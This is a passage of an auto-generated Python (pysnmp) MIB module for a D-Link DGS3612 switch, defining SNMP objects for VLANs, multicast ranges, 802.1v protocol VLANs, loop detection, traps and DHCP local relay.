if mibBuilder.loadTexts: swL2LimitedMulticastAddressTable.setDescription('A table contains the limited multicast address information.')
swL2LimitedMulticastAddressEntry = MibTableRow((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 15, 2, 1), ).setIndexNames((0, "DGS3612-L2MGMT-MIB", "swL2LimitedMulticastAddressPort"), (0, "DGS3612-L2MGMT-MIB", "swL2LimitedMulticastAddressRangeName"))
if mibBuilder.loadTexts: swL2LimitedMulticastAddressEntry.setStatus('current')
if mibBuilder.loadTexts: swL2LimitedMulticastAddressEntry.setDescription('The information of limited multicast address.')
swL2LimitedMulticastAddressPort = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 15, 2, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2LimitedMulticastAddressPort.setStatus('current')
if mibBuilder.loadTexts: swL2LimitedMulticastAddressPort.setDescription('The port index.')
swL2LimitedMulticastAddressRangeName = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 15, 2, 1, 2), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(1, 32))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2LimitedMulticastAddressRangeName.setStatus('current')
if mibBuilder.loadTexts: swL2LimitedMulticastAddressRangeName.setDescription('The name of multicast address range.')
swL2LimitedMulticastAddressHead = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 15, 2, 1, 3), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2LimitedMulticastAddressHead.setStatus('current')
if mibBuilder.loadTexts: swL2LimitedMulticastAddressHead.setDescription('The head of multicast address range.')
swL2LimitedMulticastAddressTail = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 15, 2, 1, 4), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2LimitedMulticastAddressTail.setStatus('current')
if mibBuilder.loadTexts: swL2LimitedMulticastAddressTail.setDescription('The tail of multicast address range.')
swL2VlanTable = MibTable((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 17, 1), )
if mibBuilder.loadTexts: swL2VlanTable.setStatus('current')
if mibBuilder.loadTexts: swL2VlanTable.setDescription('A table containing current configuration information for each VLAN currently configured into the device by (local or network) management, or dynamically created as a result of GVRP requests received.')
swL2VlanEntry = MibTableRow((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 17, 1, 1), ).setIndexNames((0, "DGS3612-L2MGMT-MIB", "swL2VlanIndex"))
if mibBuilder.loadTexts: swL2VlanEntry.setStatus('current')
if mibBuilder.loadTexts: swL2VlanEntry.setDescription('Information for a VLAN configured into the device by (local or network) management, or dynamically created as a result of GVRP requests received.')
swL2VlanIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 17, 1, 1, 1), VlanId())
if mibBuilder.loadTexts: swL2VlanIndex.setStatus('current')
if mibBuilder.loadTexts: swL2VlanIndex.setDescription('The VLAN ID of the VLAN to be created. The range is 1 - 4094.')
swL2VlanName = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 17, 1, 1, 2), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 32))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2VlanName.setStatus('current')
if mibBuilder.loadTexts: swL2VlanName.setDescription('The name of the VLAN to be displayed.')
swL2VlanType = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 17, 1, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1, 2, 3, 4, 5))).clone(namedValues=NamedValues(("invalid-vlan-type", 0), ("static-1q-vlan", 1), ("dynamic-vlan", 2), ("port-base-vlan", 3), ("protocolvlan", 4), ("double-vlan", 5)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2VlanType.setStatus('current')
if mibBuilder.loadTexts: swL2VlanType.setDescription('The type of the VLAN to be displayed.')
swL2VlanMemberPorts = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 17, 1, 1, 4), PortList()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2VlanMemberPorts.setStatus('current')
if mibBuilder.loadTexts: swL2VlanMemberPorts.setDescription('A range of member ports to the VLAN.')
swL2VlanStaticPorts = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 17, 1, 1, 5), PortList()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2VlanStaticPorts.setStatus('current')
if mibBuilder.loadTexts: swL2VlanStaticPorts.setDescription('A range of static ports to the VLAN.')
swL2VlanStaticTaggedPorts = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 17, 1, 1, 6), PortList()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2VlanStaticTaggedPorts.setStatus('current')
if mibBuilder.loadTexts: swL2VlanStaticTaggedPorts.setDescription('Specifies the additional ports as tagged.')
swL2VlanStaticUntaggedPorts = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 17, 1, 1, 7), PortList()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2VlanStaticUntaggedPorts.setStatus('current')
if mibBuilder.loadTexts: swL2VlanStaticUntaggedPorts.setDescription('Specifies the additional ports as untagged.')
swL2VlanForbiddenPorts = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 17, 1, 1, 8), PortList()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2VlanForbiddenPorts.setStatus('current')
if mibBuilder.loadTexts: swL2VlanForbiddenPorts.setDescription('The set of ports which are prohibited by management from being included in the egress list for this VLAN. Changes to this object that cause a port to be included or excluded affect the per-port per-VLAN Registrar control for Registration Forbidden for the relevant GVRP state machine on each port. A port may not be added in this set if it is already a member of the set of ports in dot1qVlanStaticEgressPorts. The default value of this object is a string of zeros of appropriate length, excluding all ports from the forbidden set.')
swL2VlanCurrentTaggedPorts = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 17, 1, 1, 9), PortList()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2VlanCurrentTaggedPorts.setStatus('current')
if mibBuilder.loadTexts: swL2VlanCurrentTaggedPorts.setDescription('The set of ports which are transmitting traffic for this VLAN as tagged frames.')
swL2VlanCurrentUntaggedPorts = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 17, 1, 1, 10), PortList()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2VlanCurrentUntaggedPorts.setStatus('current')
if mibBuilder.loadTexts: swL2VlanCurrentUntaggedPorts.setDescription('The set of ports which are transmitting traffic for this VLAN as untagged frames.')
swL2VlanAdvertisementState = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 17, 1, 1, 11), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("other", 1), ("disabled", 2), ("enabled", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2VlanAdvertisementState.setStatus('current')
if mibBuilder.loadTexts: swL2VlanAdvertisementState.setDescription('Specifies the VLAN as able to join GVRP If this parameter is not set, the VLAN cannot be configured to have forbidden ports. This flag protocol VLAN is fixed to DISABLE.')
swL2PVIDAutoAssignmentState = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 17, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("enabled", 1), ("disabled", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2PVIDAutoAssignmentState.setStatus('current')
if mibBuilder.loadTexts: swL2PVIDAutoAssignmentState.setDescription("This object controls the PVID auto assigment state. If 'Auto-assign PVID' is disabled, PVID only be changed by PVID configuration (user changes explicitly). The VLAN configuration will not automatically change PVID. If 'Auto-assign PVID' is enabled, PVID will be possibly changed by PVID or VLAN configuration. When user configures a port to VLAN X's untagged membership, this port's PVID will be updated with VLAN X. In the form of VLAN list command, PVID is updated with last item of VLAN list. When user removes a port from the untagged membership of the PVID's VLAN, the port's PVID will be assigned with 'default VLAN'.")
swL2dot1vProtocolGroupTable = MibTable((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 18, 1), )
if mibBuilder.loadTexts: swL2dot1vProtocolGroupTable.setReference('IEEE 802.1v clause 8.6.4')
if mibBuilder.loadTexts: swL2dot1vProtocolGroupTable.setStatus('current')
if mibBuilder.loadTexts: swL2dot1vProtocolGroupTable.setDescription('A table that contains mappings from Protocol Templates to Protocol Group Identifiers used for Port-and-Protocol-based VLAN Classification.')
swL2dot1vProtocolGroupEntry = MibTableRow((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 18, 1, 1), ).setIndexNames((0, "DGS3612-L2MGMT-MIB", "swL2dot1vProtocolTemplateFrameType"), (0, "DGS3612-L2MGMT-MIB", "swL2dot1vProtocolTemplateProtocolValue"))
if mibBuilder.loadTexts: swL2dot1vProtocolGroupEntry.setStatus('current')
if mibBuilder.loadTexts: swL2dot1vProtocolGroupEntry.setDescription('A mapping from a Protocol Template to a Protocol Group Identifier.')
swL2dot1vProtocolTemplateFrameType = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 18, 1, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("ethernet", 1), ("rfc1042", 2), ("llcOther", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2dot1vProtocolTemplateFrameType.setReference('IEEE 802.1v clause 8.6.2')
if mibBuilder.loadTexts: swL2dot1vProtocolTemplateFrameType.setStatus('current')
if mibBuilder.loadTexts: swL2dot1vProtocolTemplateFrameType.setDescription("The data-link encapsulation format or the 'detagged_frame_type' in a Protocol Template.")
swL2dot1vProtocolTemplateProtocolValue = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 18, 1, 1, 2), OctetString().subtype(subtypeSpec=ValueSizeConstraint(2, 2)).setFixedLength(2)).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2dot1vProtocolTemplateProtocolValue.setReference('IEEE 802.1v clause 8.6.2')
if mibBuilder.loadTexts: swL2dot1vProtocolTemplateProtocolValue.setStatus('current')
if mibBuilder.loadTexts: swL2dot1vProtocolTemplateProtocolValue.setDescription("The identification of the protocol above the data-link layer in a Protocol Template. Depending on the frame type, the octet string will have one of the following values: For 'ethernet', 'rfc1042' and 'snap8021H', this is the 16-bit (2-octet) IEEE 802.3 Type Field. For 'llcOther', this is the 2-octet IEEE 802.2 Link Service Access Point (LSAP) pair: first octet for Destination Service Access Point (DSAP) and second octet for Source Service Access Point (SSAP).")
swL2dot1vProtocolGroupId = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 18, 1, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 16))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: swL2dot1vProtocolGroupId.setReference('IEEE 802.1v clause 8.6.3, 12.10.2.1')
if mibBuilder.loadTexts: swL2dot1vProtocolGroupId.setStatus('current')
if mibBuilder.loadTexts: swL2dot1vProtocolGroupId.setDescription('Represents a group of protocols that are associated together when assigning a VID to a frame.')
swL2dot1vProtocolGroupRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 18, 1, 1, 4), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: swL2dot1vProtocolGroupRowStatus.setStatus('current')
if mibBuilder.loadTexts: swL2dot1vProtocolGroupRowStatus.setDescription('This object indicates the status of this entry.')
swL2dot1vProtocolPortTable = MibTable((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 18, 2), )
if mibBuilder.loadTexts: swL2dot1vProtocolPortTable.setReference('IEEE 802.1v clause 8.4.4')
if mibBuilder.loadTexts: swL2dot1vProtocolPortTable.setStatus('current')
if mibBuilder.loadTexts: swL2dot1vProtocolPortTable.setDescription('A table that contains VID sets used for Port-and-Protocol-based VLAN Classification.')
swL2dot1vProtocolPortEntry = MibTableRow((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 18, 2, 1), ).setIndexNames((0, "DGS3612-L2MGMT-MIB", "swL2dot1vProtocolPort"), (0, "DGS3612-L2MGMT-MIB", "swL2dot1vProtocolPortGroupId"))
if mibBuilder.loadTexts: swL2dot1vProtocolPortEntry.setStatus('current')
if mibBuilder.loadTexts: swL2dot1vProtocolPortEntry.setDescription('A VID set for a port.')
swL2dot1vProtocolPort = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 18, 2, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2dot1vProtocolPort.setStatus('current')
if mibBuilder.loadTexts: swL2dot1vProtocolPort.setDescription('The port number of the port.')
swL2dot1vProtocolPortGroupId = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 18, 2, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 16))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2dot1vProtocolPortGroupId.setReference('IEEE 802.1v clause 8.6.3, 12.10.1.2')
if mibBuilder.loadTexts: swL2dot1vProtocolPortGroupId.setStatus('current')
if mibBuilder.loadTexts: swL2dot1vProtocolPortGroupId.setDescription('Designates a group of protocols in the Protocol Group Database.')
swL2dot1vProtocolPortGroupVid = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 18, 2, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 4094))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2dot1vProtocolPortGroupVid.setReference('IEEE 802.1v clause 8.4.4, 12.10.1.2')
if mibBuilder.loadTexts: swL2dot1vProtocolPortGroupVid.setStatus('current')
if mibBuilder.loadTexts: swL2dot1vProtocolPortGroupVid.setDescription('The VID associated with a group of protocols for each port.')
swL2dot1vProtocolPortRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 18, 2, 1, 5), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: swL2dot1vProtocolPortRowStatus.setStatus('current')
if mibBuilder.loadTexts: swL2dot1vProtocolPortRowStatus.setDescription('This object indicates the status of this entry.')
swL2MulticastRangeTable = MibTable((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 19, 1), )
if mibBuilder.loadTexts: swL2MulticastRangeTable.setStatus('current')
if mibBuilder.loadTexts: swL2MulticastRangeTable.setDescription('A table contains multicast address range information.')
swL2MulticastRangeEntry = MibTableRow((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 19, 1, 1), ).setIndexNames((0, "DGS3612-L2MGMT-MIB", "swL2MulticastRangeName"))
if mibBuilder.loadTexts: swL2MulticastRangeEntry.setStatus('current')
if mibBuilder.loadTexts: swL2MulticastRangeEntry.setDescription('Information about multicast address range.')
swL2MulticastRangeName = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 19, 1, 1, 1), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(1, 32))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2MulticastRangeName.setStatus('current')
if mibBuilder.loadTexts: swL2MulticastRangeName.setDescription('The name of multicast address range.')
swL2MulticastRangeHead = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 19, 1, 1, 2), IpAddress()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: swL2MulticastRangeHead.setStatus('current')
if mibBuilder.loadTexts: swL2MulticastRangeHead.setDescription('The head of multicast address range.')
swL2MulticastRangeTail = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 19, 1, 1, 3), IpAddress()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: swL2MulticastRangeTail.setStatus('current')
if mibBuilder.loadTexts: swL2MulticastRangeTail.setDescription('The tail of multicast address range.')
swL2MulticastRangeState = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 19, 1, 1, 4), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: swL2MulticastRangeState.setStatus('current')
if mibBuilder.loadTexts: swL2MulticastRangeState.setDescription('This object indicates the status of this entry.')
swL2LoopDetectCtrl = MibIdentifier((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 20, 1))
swL2LoopDetectAdminState = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 20, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("enabled", 1), ("disabled", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2LoopDetectAdminState.setStatus('current')
if mibBuilder.loadTexts: swL2LoopDetectAdminState.setDescription('This object indicates the loopback detection status for the system.')
swL2LoopDetectInterval = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 20, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 32767))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2LoopDetectInterval.setStatus('current')
if mibBuilder.loadTexts: swL2LoopDetectInterval.setDescription('This object indicates the interval value, the range is from 1 to 32767 seconds.')
swL2LoopDetectRecoverTime = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 20, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 1000000))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2LoopDetectRecoverTime.setStatus('current')
if mibBuilder.loadTexts: swL2LoopDetectRecoverTime.setDescription('This object indicates the recover time, the range is from 60 to 1000000. The value of 0 disables the recover function.')
swL2LoopDetectMode = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 20, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("vlan-based", 1), ("port-based", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2LoopDetectMode.setStatus('current')
if mibBuilder.loadTexts: swL2LoopDetectMode.setDescription('This object indicates the loopback detection mode for the system.')
swL2LoopDetectTrapMode = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 20, 1, 5), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("none", 1), ("loop_detected", 2), ("loop_cleared", 3), ("both", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2LoopDetectTrapMode.setStatus('current')
if mibBuilder.loadTexts: swL2LoopDetectTrapMode.setDescription('This object indicates the loopback detection trap mode for the system.')
swL2LoopDetectPortMgmt = MibIdentifier((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 20, 2))
swL2LoopDetectPortTable = MibTable((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 20, 2, 1), )
if mibBuilder.loadTexts: swL2LoopDetectPortTable.setStatus('current')
if mibBuilder.loadTexts: swL2LoopDetectPortTable.setDescription('The table specifies the loopback detection function specified by port.')
swL2LoopDetectPortEntry = MibTableRow((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 20, 2, 1, 1), ).setIndexNames((0, "DGS3612-L2MGMT-MIB", "swL2LoopDetectPortIndex"))
if mibBuilder.loadTexts: swL2LoopDetectPortEntry.setStatus('current')
if mibBuilder.loadTexts: swL2LoopDetectPortEntry.setDescription('The table specifies the loopback detection function specified by port.')
swL2LoopDetectPortIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 20, 2, 1, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2LoopDetectPortIndex.setStatus('current')
if mibBuilder.loadTexts: swL2LoopDetectPortIndex.setDescription("This object indicates the module's port number. The range is from 1 to the maximum port number specified in the module")
swL2LoopDetectPortState = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 20, 2, 1, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("enabled", 1), ("disabled", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2LoopDetectPortState.setStatus('current')
if mibBuilder.loadTexts: swL2LoopDetectPortState.setDescription('This object indicates the loopback detection function state on the port.')
swL2LoopDetectPortLoopVLAN = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 20, 2, 1, 1, 3), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2LoopDetectPortLoopVLAN.setStatus('current')
if mibBuilder.loadTexts: swL2LoopDetectPortLoopVLAN.setDescription('This object indicates the VLAN list that has detected a loopback.')
swL2LoopDetectPortLoopStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 20, 2, 1, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("normal", 1), ("loop", 2), ("error", 3), ("none", 4)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2LoopDetectPortLoopStatus.setStatus('current')
if mibBuilder.loadTexts: swL2LoopDetectPortLoopStatus.setDescription('This object indicates the port status.')
swL2Notify = MibIdentifier((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 16, 1))
swL2NotifyPrefix = MibIdentifier((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 16, 1, 2))
swL2NotifFirmware = MibIdentifier((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 16, 1, 2, 0))
swL2macNotification = NotificationType((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 16, 1, 2, 0, 1)).setObjects(("DGS3612-L2MGMT-MIB", "swL2macNotifyInfo"))
if mibBuilder.loadTexts: swL2macNotification.setStatus('current')
if mibBuilder.loadTexts: swL2macNotification.setDescription(' This trap indicates the mac addresses variation in address table . ')
swL2PortLoopOccurred = NotificationType((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 16, 1, 2, 0, 3)).setObjects(("DGS3612-L2MGMT-MIB", "swL2LoopDetectPortIndex"))
if mibBuilder.loadTexts: swL2PortLoopOccurred.setStatus('current')
if mibBuilder.loadTexts: swL2PortLoopOccurred.setDescription('The trap is sent when Port loop occurred.')
swL2PortLoopRestart = NotificationType((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 16, 1, 2, 0, 4)).setObjects(("DGS3612-L2MGMT-MIB", "swL2LoopDetectPortIndex"))
if mibBuilder.loadTexts: swL2PortLoopRestart.setStatus('current')
if mibBuilder.loadTexts: swL2PortLoopRestart.setDescription('The trap is sent when Port loop restart after interval time.')
swL2VlanLoopOccurred = NotificationType((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 16, 1, 2, 0, 5)).setObjects(("DGS3612-L2MGMT-MIB", "swL2LoopDetectPortIndex"), ("DGS3612-L2MGMT-MIB", "swL2VlanLoopDetectVID"))
if mibBuilder.loadTexts: swL2VlanLoopOccurred.setStatus('current')
if mibBuilder.loadTexts: swL2VlanLoopOccurred.setDescription('The trap is sent when Port with VID loop occurred.')
swL2VlanLoopRestart = NotificationType((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 16, 1, 2, 0, 6)).setObjects(("DGS3612-L2MGMT-MIB", "swL2LoopDetectPortIndex"), ("DGS3612-L2MGMT-MIB", "swL2VlanLoopDetectVID"))
if mibBuilder.loadTexts: swL2VlanLoopRestart.setStatus('current')
if mibBuilder.loadTexts: swL2VlanLoopRestart.setDescription('The trap is sent when Port with VID loop restart after interval time.')
swl2NotificationBidings = MibIdentifier((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 16, 1, 2, 1))
swL2macNotifyInfo = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 16, 1, 2, 1, 1), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 1024))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2macNotifyInfo.setStatus('current')
if mibBuilder.loadTexts: swL2macNotifyInfo.setDescription('This object indicates the last time reboot information.')
swL2VlanLoopDetectVID = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 16, 1, 2, 1, 3), Integer32()).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: swL2VlanLoopDetectVID.setStatus('current')
if mibBuilder.loadTexts: swL2VlanLoopDetectVID.setDescription('This object indicates the VID that has detected a loopback.')
swL2DhcpLocalRelayState = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 24, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("other", 1), ("disabled", 2), ("enabled", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2DhcpLocalRelayState.setStatus('current')
if mibBuilder.loadTexts: swL2DhcpLocalRelayState.setDescription('This object indicates the status of the DHCP local relay function of the switch.')
swL2DhcpLocalRelayVLANTable = MibTable((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 24, 2), )
if mibBuilder.loadTexts: swL2DhcpLocalRelayVLANTable.setStatus('current')
if mibBuilder.loadTexts: swL2DhcpLocalRelayVLANTable.setDescription('This table is used to manage the DHCP local relay status for each VLAN.')
swL2DhcpLocalRelayVLANEntry = MibTableRow((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 24, 2, 1), ).setIndexNames((0, "DGS3612-L2MGMT-MIB", "swL2DhcpLocalRelayVLANID"))
if mibBuilder.loadTexts: swL2DhcpLocalRelayVLANEntry.setStatus('current')
if mibBuilder.loadTexts: swL2DhcpLocalRelayVLANEntry.setDescription('This object lists the current VLANs in the switch and their corresponding DHCP local relay status.')
swL2DhcpLocalRelayVLANID = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 24, 2, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 4094))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2DhcpLocalRelayVLANID.setStatus('current')
if mibBuilder.loadTexts: swL2DhcpLocalRelayVLANID.setDescription('This object shows the VIDs of the current VLANS in the switch.')
swL2DhcpLocalRelayVLANState = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 24, 2, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("other", 1), ("disabled", 2), ("enabled", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2DhcpLocalRelayVLANState.setStatus('current')
if mibBuilder.loadTexts: swL2DhcpLocalRelayVLANState.setDescription('This object indicates the status of the DHCP relay function of the VLAN.')
mibBuilder.exportSymbols("DGS3612-L2MGMT-MIB", swL2QOS8021pDefaultPriorityTable=swL2QOS8021pDefaultPriorityTable, swL2QOS8021pUserPriorityEntry=swL2QOS8021pUserPriorityEntry, swL2PortBufferFullDrops=swL2PortBufferFullDrops, swL2PortAutoNegInfoTable=swL2PortAutoNegInfoTable, swL2DevCtrlTelnet=swL2DevCtrlTelnet, swL2IGMPMaxSupportedVlans=swL2IGMPMaxSupportedVlans, swIGMPSnoopingGroupVid=swIGMPSnoopingGroupVid, swL2IGMPForwardingVid=swL2IGMPForwardingVid, swL2IGMPCtrlEntry=swL2IGMPCtrlEntry, swL2IGMPFastLeaveState=swL2IGMPFastLeaveState, swL2TrunkVLANPort=swL2TrunkVLANPort, swL2IGMPMacAddr=swL2IGMPMacAddr, swL2IGMPMulticastVlanGroupTable=swL2IGMPMulticastVlanGroupTable, swL2PortLoopRestart=swL2PortLoopRestart, swL2QOSBandwidthRadiusRxRate=swL2QOSBandwidthRadiusRxRate, swL2DevCtrlWebTcpPort=swL2DevCtrlWebTcpPort, swL2TrunkCurrentNumEntries=swL2TrunkCurrentNumEntries, swIGMPSnoopingGroupSourceAddr=swIGMPSnoopingGroupSourceAddr, swL2DevAlarm=swL2DevAlarm, swL2IGMPRouteTimeout=swL2IGMPRouteTimeout, swL2PVIDAutoAssignmentState=swL2PVIDAutoAssignmentState, swL2PortCtrlNwayState=swL2PortCtrlNwayState, swL2MultiFilter=swL2MultiFilter, swL2NotifFirmware=swL2NotifFirmware, swL2IGMPPortMap=swL2IGMPPortMap, swL2VlanIndex=swL2VlanIndex, swL2IGMPSnoopingStaticGroupMemberPortList=swL2IGMPSnoopingStaticGroupMemberPortList, swL2IGMPRouterPortsEntry=swL2IGMPRouterPortsEntry, swL2MulticastRangeHead=swL2MulticastRangeHead, swL2DevCtrlTelnetTcpPort=swL2DevCtrlTelnetTcpPort, swL2PortCtrlMACNotifyState=swL2PortCtrlMACNotifyState, swL2IGMPHostTimeout=swL2IGMPHostTimeout, swL2QOSSchedulingTable=swL2QOSSchedulingTable, swL2IGMPMulticastVlanSourcePort=swL2IGMPMulticastVlanSourcePort, swL2DevCtrlLLDPForwardMessageState=swL2DevCtrlLLDPForwardMessageState, swL2PortCtrlJumboFrameMaxSize=swL2PortCtrlJumboFrameMaxSize, swDevModuleInfoModuleName=swDevModuleInfoModuleName, 